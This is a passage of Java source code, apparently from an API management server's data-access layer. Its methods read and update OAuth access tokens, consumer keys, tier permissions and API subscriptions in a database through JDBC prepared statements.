", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return apiKey; } public Map<Integer, APIKey> getAccessTokens(String query) throws APIManagementException { Map<Integer, APIKey> tokenDataMap = new HashMap<Integer, APIKey>(); if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { String[] keyStoreTables = APIUtil.getAvailableKeyStoreTables(); if (keyStoreTables != null) { for (String keyStoreTable : keyStoreTables) { Map<Integer, APIKey> tokenDataMapTmp = getAccessTokens(query, getTokenSql(keyStoreTable)); tokenDataMap.putAll(tokenDataMapTmp); } } } else { tokenDataMap = getAccessTokens(query, getTokenSql(null)); } return tokenDataMap; } private Map<Integer, APIKey> getAccessTokens(String query, String getTokenSql) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; Map<Integer, APIKey> tokenDataMap = new HashMap<Integer, APIKey>(); try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getTokenSql); result = ps.executeQuery(); boolean accessTokenRowBreaker = false; Integer i = 0; while (accessTokenRowBreaker || result.next()) { accessTokenRowBreaker = false; String accessToken = APIUtil.decryptToken(result.getString("ACCESS_TOKEN")); String regex = "(?i)[a-zA-Z0-9_.-|]*" + query.trim() + "(?i)[a-zA-Z0-9_.-|]*"; Pattern pattern; Matcher matcher; pattern = Pattern.compile(regex); matcher = pattern.matcher(accessToken); if (matcher.matches()) { APIKey apiKey = new APIKey(); apiKey.setAccessToken(accessToken); String username = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_AUTHORIZED_USER); String domainName = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_USER_DOMAIN); String endUsernameWithDomain = UserCoreUtil.addDomainToName(username, domainName); apiKey.setAuthUser(endUsernameWithDomain); apiKey.setCreatedDate(result.getTimestamp("TIME_CREATED").toString().split("\\.")[0]); String consumerKey = result.getString("CONSUMER_KEY"); apiKey.setConsumerKey(consumerKey); apiKey.setValidityPeriod(result.getLong("VALIDITY_PERIOD")); // Load all the rows to in memory and build the scope string List<String> scopes = new ArrayList<String>(); String tokenString = result.getString("ACCESS_TOKEN"); do { String currentRowTokenString = result.getString("ACCESS_TOKEN"); if (tokenString.equals(currentRowTokenString)) { scopes.add(result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_TOKEN_SCOPE)); } else { accessTokenRowBreaker = true; break; } } while (result.next()); apiKey.setTokenScope(getScopeString(scopes)); tokenDataMap.put(i, apiKey); i++; } } } catch (SQLException e) { handleException("Failed to get access token data. ", e); } catch (CryptoException e) { handleException("Failed to get access token data. 
", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return tokenDataMap; } private String getTokenSql(String accessTokenStoreTable) { String tokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; if (accessTokenStoreTable != null) { tokenStoreTable = accessTokenStoreTable; } return SQLConstants.GET_TOKEN_SQL_PREFIX + tokenStoreTable + SQLConstants.GET_TOKEN_SQL_SUFFIX; } public Map<Integer, APIKey> getAccessTokensByUser(String user, String loggedInUser) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; Map<Integer, APIKey> tokenDataMap = new HashMap<Integer, APIKey>(); String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableNameOfUserId(user, accessTokenStoreTable); String getTokenSql = SQLConstants.GET_ACCESS_TOKEN_BY_USER_PREFIX + accessTokenStoreTable + SQLConstants .GET_ACCESS_TOKEN_BY_USER_SUFFIX; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getTokenSql); ps.setString(1, user); result = ps.executeQuery(); Integer i = 0; boolean accessTokenRowBreaker = false; while (accessTokenRowBreaker || result.next()) { accessTokenRowBreaker = false; String username = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_AUTHORIZED_USER); String domainName = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_USER_DOMAIN); String authorizedUserWithDomain = UserCoreUtil.addDomainToName(username, domainName); if (APIUtil.isLoggedInUserAuthorizedToRevokeToken(loggedInUser, authorizedUserWithDomain)) { String accessToken = APIUtil.decryptToken(result.getString("ACCESS_TOKEN")); APIKey apiKey = new APIKey(); apiKey.setAccessToken(accessToken); apiKey.setAuthUser(authorizedUserWithDomain); apiKey.setCreatedDate(result.getTimestamp("TIME_CREATED").toString().split("\\.")[0]); String consumerKey = result.getString("CONSUMER_KEY"); apiKey.setConsumerKey(consumerKey); apiKey.setValidityPeriod(result.getLong("VALIDITY_PERIOD")); // Load all the rows to in memory and build the scope string List<String> scopes = new ArrayList<String>(); String tokenString = result.getString("ACCESS_TOKEN"); do { String currentRowTokenString = result.getString("ACCESS_TOKEN"); if (tokenString.equals(currentRowTokenString)) { scopes.add(result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_TOKEN_SCOPE)); } else { accessTokenRowBreaker = true; break; } } while (result.next()); apiKey.setTokenScope(getScopeString(scopes)); tokenDataMap.put(i, apiKey); i++; } } } catch (SQLException e) { handleException("Failed to get access token data. ", e); } catch (CryptoException e) { handleException("Failed to get access token data. 
", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return tokenDataMap; } private Map<String, OAuthApplicationInfo> getOAuthApplications(int applicationId) throws APIManagementException { Map<String, OAuthApplicationInfo> map = new HashMap<String, OAuthApplicationInfo>(); OAuthApplicationInfo prodApp = getClientOfApplication(applicationId, "PRODUCTION"); if (prodApp != null) { map.put("PRODUCTION", prodApp); } OAuthApplicationInfo sandboxApp = getClientOfApplication(applicationId, "SANDBOX"); if (sandboxApp != null) { map.put("SANDBOX", sandboxApp); } return map; } public OAuthApplicationInfo getClientOfApplication(int applicationID, String keyType) throws APIManagementException { String sqlQuery = SQLConstants.GET_CLIENT_OF_APPLICATION_SQL; KeyManager keyManager = null; OAuthApplicationInfo oAuthApplication = null; Connection connection = null; PreparedStatement ps = null; ResultSet rs = null; String consumerKey = null; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setInt(1, applicationID); ps.setString(2, keyType); rs = ps.executeQuery(); while (rs.next()) { consumerKey = rs.getString(1); } if (consumerKey != null) { keyManager = KeyManagerHolder.getKeyManagerInstance(); oAuthApplication = keyManager.retrieveApplication(consumerKey); } } catch (SQLException e) { handleException("Failed to get client of application. SQL error", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, rs); } return oAuthApplication; } public APIKey getKeyStatusOfApplication(String keyType, int applicationId) throws APIManagementException { Connection connection = null; PreparedStatement preparedStatement = null; ResultSet resultSet = null; APIKey key = null; String sqlQuery = SQLConstants.GET_KEY_STATUS_OF_APPLICATION_SQL; try { connection = APIMgtDBUtil.getConnection(); preparedStatement = connection.prepareStatement(sqlQuery); preparedStatement.setInt(1, applicationId); preparedStatement.setString(2, keyType); resultSet = preparedStatement.executeQuery(); while (resultSet.next()) { key = new APIKey(); key.setState(resultSet.getString("STATE")); } } catch (SQLException e) { handleException("Error occurred while getting the State of Access Token", e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, resultSet); } return key; } /** * Gets ConsumerKeys when given the Application ID. 
* * @param applicationId * @return {@link java.util.Set} containing ConsumerKeys * @throws APIManagementException */ public Set<String> getConsumerKeysOfApplication(int applicationId) throws APIManagementException { Connection connection = null; PreparedStatement preparedStatement = null; ResultSet resultSet = null; Set<String> consumerKeys = new HashSet<String>(); String sqlQuery = SQLConstants.GET_CONSUMER_KEYS_OF_APPLICATION_SQL; try { connection = APIMgtDBUtil.getConnection(); preparedStatement = connection.prepareStatement(sqlQuery); preparedStatement.setInt(1, applicationId); resultSet = preparedStatement.executeQuery(); while (resultSet.next()) { String consumerKey = resultSet.getString("CONSUMER_KEY"); if (consumerKey != null) { consumerKeys.add(consumerKey); } } } catch (SQLException e) { handleException("Error occurred while getting the State of Access Token", e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, resultSet); } return consumerKeys; } public Set<String> getApplicationKeys(int applicationId) throws APIManagementException { Set<String> apiKeys = new HashSet<String>(); if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { String[] keyStoreTables = APIUtil.getAvailableKeyStoreTables(); if (keyStoreTables != null) { for (String keyStoreTable : keyStoreTables) { apiKeys = getApplicationKeys(applicationId, getKeysSql(keyStoreTable)); if (apiKeys.size() > 0) { break; } } } } else { apiKeys = getApplicationKeys(applicationId, getKeysSql(null)); } return apiKeys; } public void updateTierPermissions(String tierName, String permissionType, String roles, int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; PreparedStatement insertOrUpdatePS = null; ResultSet resultSet = null; int tierPermissionId = -1; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String getTierPermissionQuery = SQLConstants.GET_TIER_PERMISSION_ID_SQL; ps = conn.prepareStatement(getTierPermissionQuery); ps.setString(1, tierName); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); if (resultSet.next()) { tierPermissionId = resultSet.getInt("TIER_PERMISSIONS_ID"); } if (tierPermissionId == -1) { String query = SQLConstants.ADD_TIER_PERMISSION_SQL; insertOrUpdatePS = conn.prepareStatement(query); insertOrUpdatePS.setString(1, tierName); insertOrUpdatePS.setString(2, permissionType); insertOrUpdatePS.setString(3, roles); insertOrUpdatePS.setInt(4, tenantId); insertOrUpdatePS.execute(); } else { String query = SQLConstants.UPDATE_TIER_PERMISSION_SQL; insertOrUpdatePS = conn.prepareStatement(query); insertOrUpdatePS.setString(1, tierName); insertOrUpdatePS.setString(2, permissionType); insertOrUpdatePS.setString(3, roles); insertOrUpdatePS.setInt(4, tierPermissionId); insertOrUpdatePS.setInt(5, tenantId); insertOrUpdatePS.executeUpdate(); } conn.commit(); } catch (SQLException e) { handleException("Error in updating tier permissions: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); APIMgtDBUtil.closeAllConnections(insertOrUpdatePS, null, null); } } public Set<TierPermissionDTO> getTierPermissions(int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet resultSet = null; Set<TierPermissionDTO> tierPermissions = new HashSet<TierPermissionDTO>(); try { String getTierPermissionQuery = SQLConstants.GET_TIER_PERMISSIONS_SQL; conn = APIMgtDBUtil.getConnection(); ps = 
conn.prepareStatement(getTierPermissionQuery); ps.setInt(1, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { TierPermissionDTO tierPermission = new TierPermissionDTO(); tierPermission.setTierName(resultSet.getString("TIER")); tierPermission.setPermissionType(resultSet.getString("PERMISSIONS_TYPE")); String roles = resultSet.getString("ROLES"); if (roles != null && !roles.isEmpty()) { String roleList[] = roles.split(","); tierPermission.setRoles(roleList); } tierPermissions.add(tierPermission); } } catch (SQLException e) { handleException("Failed to get Tier permission information ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tierPermissions; } public TierPermissionDTO getTierPermission(String tierName, int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet resultSet = null; TierPermissionDTO tierPermission = null; try { String getTierPermissionQuery = SQLConstants.GET_PERMISSION_OF_TIER_SQL; conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(getTierPermissionQuery); ps.setString(1, tierName); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { tierPermission = new TierPermissionDTO(); tierPermission.setTierName(tierName); tierPermission.setPermissionType(resultSet.getString("PERMISSIONS_TYPE")); String roles = resultSet.getString("ROLES"); if (roles != null) { String roleList[] = roles.split(","); tierPermission.setRoles(roleList); } } } catch (SQLException e) { handleException("Failed to get Tier permission information for Tier " + tierName, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tierPermission; } public TierPermissionDTO getThrottleTierPermission(String tierName, int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet resultSet = null; TierPermissionDTO tierPermission = null; try { String getTierPermissionQuery = SQLConstants.GET_THROTTLE_TIER_PERMISSION_SQL; conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(getTierPermissionQuery); ps.setString(1, tierName); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { tierPermission = new TierPermissionDTO(); tierPermission.setTierName(tierName); tierPermission.setPermissionType(resultSet.getString("PERMISSIONS_TYPE")); String roles = resultSet.getString("ROLES"); if (roles != null) { String roleList[] = roles.split(","); tierPermission.setRoles(roleList); } } } catch (SQLException e) { handleException("Failed to get Tier permission information for Tier " + tierName, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tierPermission; } public void updateThrottleTierPermissions(String tierName, String permissionType, String roles, int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; PreparedStatement insertOrUpdatePS = null; ResultSet resultSet = null; int tierPermissionId = -1; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String getTierPermissionQuery = SQLConstants.GET_THROTTLE_TIER_PERMISSION_ID_SQL; ps = conn.prepareStatement(getTierPermissionQuery); ps.setString(1, tierName); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); if (resultSet.next()) { tierPermissionId = resultSet.getInt("THROTTLE_TIER_PERMISSIONS_ID"); } if (tierPermissionId == -1) { String query = SQLConstants.ADD_THROTTLE_TIER_PERMISSION_SQL; insertOrUpdatePS = 
conn.prepareStatement(query); insertOrUpdatePS.setString(1, tierName); insertOrUpdatePS.setString(2, permissionType); insertOrUpdatePS.setString(3, roles); insertOrUpdatePS.setInt(4, tenantId); insertOrUpdatePS.execute(); } else { String query = SQLConstants.UPDATE_THROTTLE_TIER_PERMISSION_SQL; insertOrUpdatePS = conn.prepareStatement(query); insertOrUpdatePS.setString(1, tierName); insertOrUpdatePS.setString(2, permissionType); insertOrUpdatePS.setString(3, roles); insertOrUpdatePS.setInt(4, tierPermissionId); insertOrUpdatePS.setInt(5, tenantId); insertOrUpdatePS.executeUpdate(); } conn.commit(); } catch (SQLException e) { handleException("Error in updating tier permissions: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); APIMgtDBUtil.closeAllConnections(insertOrUpdatePS, null, null); } } public Set<TierPermissionDTO> getThrottleTierPermissions(int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet resultSet = null; Set<TierPermissionDTO> tierPermissions = new HashSet<TierPermissionDTO>(); try { String getTierPermissionQuery = SQLConstants.GET_THROTTLE_TIER_PERMISSIONS_SQL; conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(getTierPermissionQuery); ps.setInt(1, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { TierPermissionDTO tierPermission = new TierPermissionDTO(); tierPermission.setTierName(resultSet.getString("TIER")); tierPermission.setPermissionType(resultSet.getString("PERMISSIONS_TYPE")); String roles = resultSet.getString("ROLES"); if (roles != null && !roles.isEmpty()) { String roleList[] = roles.split(","); tierPermission.setRoles(roleList); } tierPermissions.add(tierPermission); } } catch (SQLException e) { handleException("Failed to get Tier permission information ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tierPermissions; } private Set<String> getApplicationKeys(int applicationId, String getKeysSql) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; Set<String> apiKeys = new HashSet<String>(); try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getKeysSql); ps.setInt(1, applicationId); result = ps.executeQuery(); while (result.next()) { apiKeys.add(APIUtil.decryptToken(result.getString("ACCESS_TOKEN"))); } } catch (SQLException e) { handleException("Failed to get keys for application: " + applicationId, e); } catch (CryptoException e) { handleException("Failed to get keys for application: " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return apiKeys; } private String getKeysSql(String accessTokenStoreTable) { String tokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; if (accessTokenStoreTable != null) { tokenStoreTable = accessTokenStoreTable; } return SQLConstants.GET_KEY_SQL_PREFIX + tokenStoreTable + SQLConstants.GET_KEY_SQL_SUFFIX; } /** * Get access token data based on application ID * * @param subscriptionId Subscription Id * @return access token data * @throws APIManagementException */ public Map<String, String> getAccessTokenData(int subscriptionId) throws APIManagementException { Map<String, String> apiKeys = new HashMap<String, String>(); if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { String[] keyStoreTables = APIUtil.getAvailableKeyStoreTables(); if (keyStoreTables != null) { for (String keyStoreTable 
: keyStoreTables) { apiKeys = getAccessTokenData(subscriptionId, getKeysSqlUsingSubscriptionId(keyStoreTable)); if (apiKeys.size() > 0) { break; } } } } else { apiKeys = getAccessTokenData(subscriptionId, getKeysSqlUsingSubscriptionId(null)); } return apiKeys; } private Map<String, String> getAccessTokenData(int subscriptionId, String getKeysSql) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; Map<String, String> apiKeys = new HashMap<String, String>(); try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getKeysSql); ps.setInt(1, subscriptionId); result = ps.executeQuery(); while (result.next()) { apiKeys.put("token", APIUtil.decryptToken(result.getString("ACCESS_TOKEN"))); apiKeys.put("status", result.getString("TOKEN_STATE")); } } catch (SQLException e) { handleException("Failed to get keys for subscription: " + subscriptionId, e); } catch (CryptoException e) { handleException("Failed to get keys for subscription: " + subscriptionId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return apiKeys; } private String getKeysSqlUsingSubscriptionId(String accessTokenStoreTable) { String tokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; if (accessTokenStoreTable != null) { tokenStoreTable = accessTokenStoreTable; } return SQLConstants.GET_KEY_SQL_OF_SUBSCRIPTION_ID_PREFIX + tokenStoreTable + SQLConstants.GET_KEY_SQL_OF_SUBSCRIPTION_ID_SUFFIX; } /** * This method returns the set of Subscribers for given provider * * @param providerName name of the provider * @return Set<Subscriber> * @throws APIManagementException if failed to get subscribers for given provider */ public Set<Subscriber> getSubscribersOfProvider(String providerName) throws APIManagementException { Set<Subscriber> subscribers = new HashSet<Subscriber>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; try { String sqlQuery = SQLConstants.GET_SUBSCRIBERS_OF_PROVIDER_SQL; connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(providerName)); result = ps.executeQuery(); while (result.next()) { // Subscription table should have API_VERSION AND API_PROVIDER Subscriber subscriber = new Subscriber(result.getString(APIConstants.SUBSCRIBER_FIELD_EMAIL_ADDRESS)); subscriber.setName(result.getString(APIConstants.SUBSCRIBER_FIELD_USER_ID)); subscriber.setSubscribedDate(result.getDate(APIConstants.SUBSCRIBER_FIELD_DATE_SUBSCRIBED)); subscribers.add(subscriber); } } catch (SQLException e) { handleException("Failed to get subscribers for: " + providerName, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribers; } public Set<Subscriber> getSubscribersOfAPI(APIIdentifier identifier) throws APIManagementException { Set<Subscriber> subscribers = new HashSet<Subscriber>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; try { String sqlQuery = SQLConstants.GET_SUBSCRIBERS_OF_API_SQL; connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); ps.setString(2, identifier.getApiName()); ps.setString(3, identifier.getVersion()); result = ps.executeQuery(); while (result.next()) { Subscriber subscriber = new Subscriber(result.getString(APIConstants.SUBSCRIBER_FIELD_USER_ID)); 
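// the subscription timestamp carried by this row is copied onto the subscriber below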
subscriber.setSubscribedDate(result.getTimestamp(APIConstants.SUBSCRIBER_FIELD_DATE_SUBSCRIBED)); subscribers.add(subscriber); } } catch (SQLException e) { handleException("Failed to get subscribers for :" + identifier.getApiName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribers; } public long getAPISubscriptionCountByAPI(APIIdentifier identifier) throws APIManagementException { String sqlQuery = SQLConstants.GET_API_SUBSCRIPTION_COUNT_BY_API_SQL; long subscriptions = 0; Connection connection = null; PreparedStatement ps = null; ResultSet result = null; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); ps.setString(2, identifier.getApiName()); ps.setString(3, identifier.getVersion()); result = ps.executeQuery(); while (result.next()) { subscriptions = result.getLong("SUB_ID"); } } catch (SQLException e) { handleException("Failed to get subscription count for API", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscriptions; } /** * This method is used to update the subscriber * * @param identifier APIIdentifier * @param context Context of the API * @param applicationId Application id * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to update subscriber */ public void updateSubscriptions(APIIdentifier identifier, String context, int applicationId, String subscriber) throws APIManagementException { addSubscription(identifier, context, applicationId, APIConstants.SubscriptionStatus.UNBLOCKED, subscriber); } /** * This method is used to update the subscription * * @param identifier APIIdentifier * @param subStatus Subscription Status[BLOCKED/UNBLOCKED] * @param applicationId Application id * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to update subscriber */ public void updateSubscription(APIIdentifier identifier, String subStatus, int applicationId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; PreparedStatement updatePs = null; int apiId = -1; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String getApiQuery = SQLConstants.GET_API_ID_SQL; ps = conn.prepareStatement(getApiQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); ps.setString(2, identifier.getApiName()); ps.setString(3, identifier.getVersion()); resultSet = ps.executeQuery(); if (resultSet.next()) { apiId = resultSet.getInt("API_ID"); } if (apiId == -1) { String msg = "Unable to get the API ID for: " + identifier; log.error(msg); throw new APIManagementException(msg); } String subsCreateStatus = getSubscriptionCreaeteStatus(identifier, applicationId, conn); if (APIConstants.SubscriptionCreatedStatus.UN_SUBSCRIBE.equals(subsCreateStatus)) { deleteSubscriptionByApiIDAndAppID(apiId, applicationId, conn); } //This query to update the AM_SUBSCRIPTION table String sqlQuery = SQLConstants.UPDATE_SUBSCRIPTION_OF_APPLICATION_SQL; //Updating data to the AM_SUBSCRIPTION table updatePs = conn.prepareStatement(sqlQuery); updatePs.setString(1, subStatus); updatePs.setString(2, identifier.getProviderName()); updatePs.setTimestamp(3, new Timestamp(System.currentTimeMillis())); updatePs.setInt(4, apiId); updatePs.setInt(5, applicationId); updatePs.execute(); // finally commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch 
(SQLException e1) { log.error("Failed to rollback the add subscription ", e1); } } handleException("Failed to update subscription data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); APIMgtDBUtil.closeAllConnections(updatePs, null, null); } } /** * This method is used to update the subscription * * @param subscribedAPI subscribedAPI object that represents the new subscription detals * @throws APIManagementException if failed to update subscription */ public void updateSubscription(SubscribedAPI subscribedAPI) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); //This query to update the AM_SUBSCRIPTION table String sqlQuery = SQLConstants.UPDATE_SUBSCRIPTION_OF_UUID_SQL; //Updating data to the AM_SUBSCRIPTION table ps = conn.prepareStatement(sqlQuery); ps.setString(1, subscribedAPI.getSubStatus()); //TODO Need to find logged in user who does this update. ps.setString(2, null); ps.setTimestamp(3, new Timestamp(System.currentTimeMillis())); ps.setString(4, subscribedAPI.getUUID()); ps.execute(); // finally commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the update subscription ", e1); } } handleException("Failed to update subscription data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public void updateSubscriptionStatus(int subscriptionId, String status) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); //This query is to update the AM_SUBSCRIPTION table String sqlQuery = SQLConstants.UPDATE_SUBSCRIPTION_STATUS_SQL; ps = conn.prepareStatement(sqlQuery); ps.setString(1, status); ps.setInt(2, subscriptionId); ps.execute(); //Commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback subscription status update ", e1); } } handleException("Failed to update subscription status ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public String getRegistrationApprovalState(int appId, String keyType) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String state = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_REGISTRATION_APPROVAL_STATUS_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, appId); ps.setString(2, keyType); resultSet = ps.executeQuery(); while (resultSet.next()) { state = resultSet.getString("STATE"); } } catch (SQLException e) { handleException("Error while getting Application Registration State.", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return state; } /** * Update the consumer key and application status for the given key type and application. 
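* The consumer key is read from the OAuth application registered for the given key type; when no
* consumer key is available, or the application id is -1, the mapping row is left untouched.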
* * @param application * @param keyType */ public void updateApplicationKeyTypeMapping(Application application, String keyType) throws APIManagementException { OAuthApplicationInfo app = application.getOAuthApp(keyType); String consumerKey = null; if (app != null) { consumerKey = app.getClientId(); } if (consumerKey != null && application.getId() != -1) { String addApplicationKeyMapping = SQLConstants.UPDATE_APPLICAITON_KEY_TYPE_MAPPINGS_SQL; Connection connection = null; PreparedStatement ps = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); ps = connection.prepareStatement(addApplicationKeyMapping); ps.setString(1, consumerKey); ps.setInt(2, application.getId()); ps.setString(3, keyType); ps.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Error updating the CONSUMER KEY of the AM_APPLICATION_KEY_MAPPING table where " + "APPLICATION_ID = " + application.getId() + " and KEY_TYPE = " + keyType, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } } /** * This method will create a new client at key-manager side. Further, it will add a new record to * the AM_APPLICATION_KEY_MAPPING table * * @param keyType * @param applicationName apim application name. * @param userName apim user name * @param clientId this is the consumer key. * @throws APIManagementException */ public void createApplicationKeyTypeMappingForManualClients(String keyType, String applicationName, String userName, String clientId) throws APIManagementException { String consumerKey = null; if (clientId != null) { consumerKey = clientId; } Connection connection = null; PreparedStatement ps = null; //APIM application id. int applicationId = getApplicationId(applicationName, userName); if (consumerKey != null) { String addApplicationKeyMapping = SQLConstants.ADD_APPLICATION_KEY_TYPE_MAPPING_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); ps = connection.prepareStatement(addApplicationKeyMapping); ps.setInt(1, applicationId); ps.setString(2, consumerKey); ps.setString(3, keyType); ps.setString(4, APIConstants.AppRegistrationStatus.REGISTRATION_COMPLETED); // If the CK/CS pair is pasted on the screen set this to MAPPED ps.setString(5, "MAPPED"); ps.execute(); connection.commit(); } catch (SQLException e) { handleException("Error while inserting record to the AM_APPLICATION_KEY_MAPPING table, " + "error is = " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } } /** * Updates the state of the Application Registration. * * @param state State of the registration. * @param keyType PRODUCTION | SANDBOX * @param appId ID of the Application. * @throws APIManagementException if updating fails. 
*/ public void updateApplicationRegistration(String state, String keyType, int appId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; String sqlStmt = SQLConstants.UPDATE_APPLICATION_KEY_MAPPING_SQL; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); ps = conn.prepareStatement(sqlStmt); ps.setString(1, state); ps.setInt(2, appId); ps.setString(3, keyType); ps.execute(); conn.commit(); } catch (SQLException e) { handleException("Error while updating registration entry.", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } /** * @param apiIdentifier APIIdentifier * @param userId User Id * @return true if user subscribed for given APIIdentifier * @throws APIManagementException if failed to check subscribed or not */ public boolean isSubscribed(APIIdentifier apiIdentifier, String userId) throws APIManagementException { boolean isSubscribed = false; String loginUserName = getLoginUserName(userId); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_CASE_INSENSITIVE_SQL; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(apiIdentifier.getProviderName())); ps.setString(2, apiIdentifier.getApiName()); ps.setString(3, apiIdentifier.getVersion()); ps.setString(4, loginUserName); int tenantId; tenantId = APIUtil.getTenantId(loginUserName); ps.setInt(5, tenantId); rs = ps.executeQuery(); if (rs.next()) { isSubscribed = true; } } catch (SQLException e) { handleException("Error while checking if user has subscribed to the API ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return isSubscribed; } /** * @param providerName Name of the provider * @return UserApplicationAPIUsage of given provider * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to get * UserApplicationAPIUsage for given provider */ public UserApplicationAPIUsage[] getAllAPIUsageByProvider(String providerName) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; try { String sqlQuery = SQLConstants.GET_APP_API_USAGE_BY_PROVIDER_SQL; connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(providerName)); result = ps.executeQuery(); Map<String, 